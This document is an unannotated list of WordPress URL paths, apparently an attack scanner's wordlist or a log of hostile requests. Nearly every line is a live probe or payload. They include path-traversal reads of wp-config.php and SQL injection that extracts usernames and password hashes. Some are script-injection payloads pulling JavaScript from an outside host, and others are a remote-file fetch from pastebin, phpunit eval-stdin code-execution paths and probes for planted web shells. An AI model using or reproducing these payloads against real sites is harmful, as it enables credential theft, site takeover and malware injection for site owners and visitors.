/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/themes/magnitudo/framework/_scripts/valums_uploader/php.php
/wp-content/themes/nuance/functions/jwpanel/scripts/valums_uploader/php.php
/wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php
/wp-content/themes/oxygen-theme/functions/upload-handler.php
/wp-content/themes/photocrati-theme-v4.07/admin/scripts/scripts-update.php
/wp-content/themes/photocrati-theme-v4/admin/scripts/scripts-update.php
/wp-content/themes/photocrati-theme/admin/scripts/scripts-update.php
/wp-content/themes/photocrati/admin/scripts/scripts-update.php
/wp-content/themes/pinboard/themify/themify-ajax.php?upload=1
/wp-content/themes/prostore/go.php?https://interact.sh/
/wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php
/wp-content/themes/radial-theme/functions/upload-handler.php
/wp-content/themes/rayoflight-theme/functions/upload-handler.php
/wp-content/themes/reganto-theme/functions/upload-handler.php
/wp-content/themes/rockstar-theme/functions/upload-handler.php
/wp-content/themes/saico/framework/_scripts/valums_uploader/php.php
/wp-content/themes/satoshi/functions/upload-handler.php
/wp-content/themes/seotheme/0z.php
/wp-content/themes/seotheme/db.php?u
/wp-content/themes/seotheme/mar.php
/wp-content/themes/sinatra/languages/load.php
/wp-content/themes/sketch/404.php
/wp-content/themes/suco/themify/themify-ajax.php?upload=1
/wp-content/themes/synoptic/lib/avatarupload/upload.php
/wp-content/themes/theagency/includes/uploadify/uploadify.css
/wp-content/themes/tisa/themify/themify-ajax.php?upload=1
/wp-content/themes/twenty/twenty.php
/wp-content/themes/twentyeleven/inc/images/load.php
/wp-content/themes/twentyfifteen/genericons/example.html
/wp-content/themes/twentyfive/include.php
/wp-content/themes/twentynineteen/fonts/index.php
/wp-content/themes/twentytwenty/classes/index.php
/wp-content/themes/twentytwentytwo/templates/load.php
/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php
/wp-content/themes/weekender/friend.php?id=aHR0cHM6Ly9pbnRlcmFjdC5zaA==
/wp-content/themes/welcart_default/load.php
/wp-content/themes/woodmart/inc/load.php
///wp-admin/install.php
//2019/wp-login.php
//2020/wp-login.php
//blog/wp-admin/install.php
//new/wp-admin/install.php
//old/wp-admin/install.php
//old/wp-login.php
//oldsite/wp-admin/install.php
//test/wp-login.php
//wordpress/wp-admin/install.php
//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/prh-api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/plugins/realia/libraries/PayPal-PHP-SDK/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp-content/uploads/2018/01/abc/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
//wp/wp-admin/install.php
//wp/wp-login.php
//wp1/wp-login.php
//wp2/wp-login.php
/admin/wp-login.php
/blog/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
/blog/wp-login.php
/test/wp-login.php
/wordpress/wp-content/plugins/wp-phpmyadmin/phpmyadmin/scripts/setup.php
/wordpress/wp-login.php
/wp-admin
/wp-admin/
/wp-admin/admin-ajax.php
/wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
/wp-admin/admin-ajax.php?action=duplicator_download&file=dupl.txt
/wp-admin/admin-ajax.php?action=hc_ajax_save_option
/wp-admin/admin-ajax.php?action=import_csv
/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
/wp-admin/admin-ajax.php?action=rss&type=video&vid=-1%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,md5(2349819),24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39%23
/wp-admin/admin-ajax.php?action=save_map_name
/wp-admin/admin-ajax.php?action=wdt_upload_file
/wp-admin/admin-ajax.php?do_reset_wordpress=1
/wp-admin/admin-ajax.php?page=wppcp-security-settings-page
/wp-admin/admin-ajax.php?page=wppcp-settings
/wp-admin/admin-post.php
/wp-admin/admin-post.php?action=hc_ajax_save_option
/wp-admin/admin-post.php?do_reset_wordpress=1
/wp-admin/admin-post.php?page=br-aapf-setup&step=wizard_selectors
/wp-admin/admin-post.php?page=fp_admin_options_page
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&email=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&uid=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&token=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&email=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();&fly_id=1&article_placement_id=1&sidebar_placement_id=1&return_path=(function() { var elem = document.createElement(\'script\'); elem.type = \'text/javascript\'; elem.src = \'https://slow.destinyfernandi.com/hos?clod\';document.getElementsByTagName("head")[0].appendChild(elem);})();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&success=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&uid=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&token=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&email=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();&fly_id=1&article_placement_id=1&sidebar_placement_id=1&return_path=(function()%20%7B%20var%20elem%20=%20document.createElement(%5C'script%5C');%20elem.type%20=%20%5C'text/javascript%5C';%20elem.src%20=%20%5C'https://slow.destinyfernandi.com/hos?clod%5C';document.getElementsByTagName(%22head%22)[0].appendChild(elem);%7D)();
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v15\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token="><script type=text/javascript src=\'https://slow.destinyfernandi.com/hos?&v6\'></script>
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v15%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=opinionstage-content-login-callback-page&token=%22%3E%3Cscript%20type=text/javascript%20src=%5C'https://slow.destinyfernandi.com/hos?&v6%5C'%3E%3C/script%3E
/wp-admin/admin-post.php?page=social-metrics-tracker-export&smt_download_export_file=1§ion=gapi
/wp-admin/admin-post.php?page=wpim_manage_settings
/wp-admin/admin-post.php?page=wpsm_responsive_coming_soon
/wp-admin/admin-post.php?page=yuzo-related-post
/wp-admin/admin-post.php?testingfsoc=1&url=https://pastebin.com/raw/i1gLLhHJ&filename=wpdemos
/wp-admin/admin-post.php?wpematico-action=settings_tab_settings
/wp-admin/admin-post.php?yp_remote_get=2
/wp-admin/admin-post.php?yp_remote_get=3
/wp-admin/admin-post.php?yp_remote_get=test
/wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&item=wp-config.php&order=name&srt=yes
/wp-admin/plugin-install.php?tab=upload
/wp-admin/post-new.php
/wp-admin/theme-editor.php
/wp-config.php
/wp-config.php-bak
/wp-config.php.bak
/wp-config.php.new
/wp-config.php.old
/wp-config.php?aam-media=1
/wp-config.php_Old
/wp-config.php_bak
/wp-config.php_new
/wp-config.php_old
/wp-config.php~
/wp-content/adminer.php
/wp-content/force-download.php?file=../../../../../../../wp-config.php
/wp-content/plugins/CCSlider/includes/upload.php
/wp-content/plugins/accessally/resource/backend/css/accessally-manage.css
/wp-content/plugins/adminer/inc/editor/index.php
/wp-content/plugins/ajax_multi_upload/readme.txt
/wp-content/plugins/all-video-gallery/config.php?vid=1&pid=-1+union+select+1,2,3,4,concat(0x7e7e7e,74657374,0x7c7c7c,md5(74657374),0x7e7e7e),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+--
/wp-content/plugins/aviary-image-editor-add-on-for-gravity-forms/includes/upload.php
/wp-content/plugins/batchmove/js/batch.js
/wp-content/plugins/blaze-slide-show-for-wordpress/js/swfupload/js/upload.php
/wp-content/plugins/blnmrpb/log.txt
/wp-content/plugins/brizy/public/static/css/style.css
/wp-content/plugins/cherry-plugin/admin/css/cherry-admin-plugin.css
/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
/wp-content/plugins/contact-form-7/readme.txt
/wp-content/plugins/contus-hd-flv-player/uploadVideo.php
/wp-content/plugins/contus-video-galleryversion-10/upload1.php
/wp-content/plugins/front-file-manager/readme.txt
/wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
/wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
/wp-content/plugins/hd-webplayer/playlist.php?videoid=1+and+1=2+/*!union*/+/*!select*/+concat(0x7e7e7e,user_login,0x7c7c7c,user_pass,0x7e7e7e),2,3,4,5,6,7,8,9,10,11+from+wp_users
/wp-content/plugins/html5avmanager/lib/uploadify/uploadify.css
/wp-content/plugins/image-clipboard/readme.txt
/wp-content/plugins/inboundio-marketing/admin/partials/csv_uploader.php
/wp-content/plugins/indeed-membership-pro/assets/css/templates.css
/wp-content/plugins/iwp-client/clipboard.min.js
/wp-content/plugins/iwp-client/readme.txt
/wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php
/wp-content/plugins/jssor-slider/assets/css/jssor-slider.css
/wp-content/plugins/linklove/linklove.php?s=true
/wp-content/plugins/mac-dock-gallery/readme.txt
/wp-content/plugins/mailcwp/mailcwp-upload.php
/wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php
/wp-content/plugins/portable-phpmyadmin/wp-pma-mod/index.php
/wp-content/plugins/profile-builder-pro/assets/css/style-front-end.css
/wp-content/plugins/profile-builder/assets/css/serial-notice.css
/wp-content/plugins/profile-builder/assets/css/style-front-end.css
/wp-content/plugins/recent-backups/download-file.php?file_link=../../../wp-config.php
/wp-content/plugins/reflex-gallery/admin/scripts/FileUploader/php.php
/wp-content/plugins/revslider/temp/update_extract/readme.php
/wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
/wp-content/plugins/slide-show-pro/js/swfupload/js/upload.php
/wp-content/plugins/smart-slide-show/js/swfupload/js/upload.php
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/wp-content/plugins/strong-testimonials/templates/modern/content.css
/wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php
/wp-content/plugins/themegrill-demo-importer/assets/js/admin/demo-importer.js
/wp-content/plugins/uploadify/includes/check.php
/wp-content/plugins/uploadify/readme.txt
/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=verify.php
/wp-content/plugins/wordpress-database-reset/assets/css/bsmselect.css
/wp-content/plugins/wp-central/readme.txt
/wp-content/plugins/wp-phpmyadmin/wp-phpmyadmin/phpmyadmin/
/wp-content/plugins/wp-private-content-plus/css/wppcp-front.css
/wp-content/plugins/wp-time-capsule/js/opentip-jquery.js
/wp-content/plugins/wp-time-capsule/treeView/common.js
/wp-content/plugins/wp-time-capsule/wptc-dialog.css
/wp-content/plugins/wpematico/app/js/wpe_hooks.js
/wp-content/plugins/wpshopify/dist/public.min.css
/wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
/wp-content/plugins/yellow-pencil-visual-theme-customizer/js/yellow-pencil.js
/wp-content/plugins/yuzo-related-post/assets/js/admin.js
/wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
/wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
/wp-content/themes/infocus/lib/scripts/dl-skin.php
/wp-content/themes/linenity/functions/download.php?imgurl=theme-functions.php&name=theme-functions.php
/wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
/wp-content/themes/twentynineteen/404.php
/wp-content/themes/twentytwenty/404.php
/wp-content/themes/wp-update.php
/wp-content/uploads/2017/06/cropped-15-180x180.jpeg
/wp-content/uploads/2017/06/cropped-15-192x192.jpeg
/wp-content/uploads/2017/06/cropped-15-270x270.jpeg
/wp-content/uploads/2017/06/cropped-15-32x32.jpeg
/wp-content/uploads/adminer.php
/wp-content/uploads/file-manager/log.txt
/wp-login.php
/wp-login.php?action=register
/wp/wp-login.php